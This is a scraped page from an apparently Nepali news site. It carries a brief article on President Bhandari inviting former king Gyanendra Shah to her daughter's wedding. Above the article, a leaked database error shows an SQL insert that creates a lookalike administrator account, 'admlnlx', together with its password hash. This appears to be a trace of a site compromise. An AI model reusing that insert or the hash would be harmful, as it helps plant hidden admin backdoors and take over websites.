WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bb3LVf6P5V80g/LUdSm2Ltj504DYP5.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:56:37', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २-
राष्ट्रपति विद्यादेवी भण्डारीले आफ्नी छोरीको विवाहमा पूर्वराजा ज्ञानेन्द्र शाहलाई निम्तो पठाएकी छिन्। राष्ट्रपति भवनभित्रै सोमबार राष्ट्रपति विद्यादेवी भण्डारीकी कान्छी छोरी निशाकुसुम भण्डारीको विवाहका लागि पूर्वराजा शाहलाई सोमबार मध्यान्ह १२ बजे शीतलनिवासमा बोलाइएको छ ।
निशाकुसुमको गणतन्त्र नेपालका पहिलो राष्ट्रपति रामवरण यादवका नाति अभिशेष यादवसँग हुँदैछ । पूर्वराजपरिवारका सदस्यहरुमा विवाह लगायतका सामाजिक समारोहरुमा निम्तो आएका बेला सहभागिता जनाउने संस्कार र परम्परा रही आएको छ । यद्यपी उनी यस विवाह समारोहमा जाने नजाने निश्चित नभएको स्रोतले बतायो।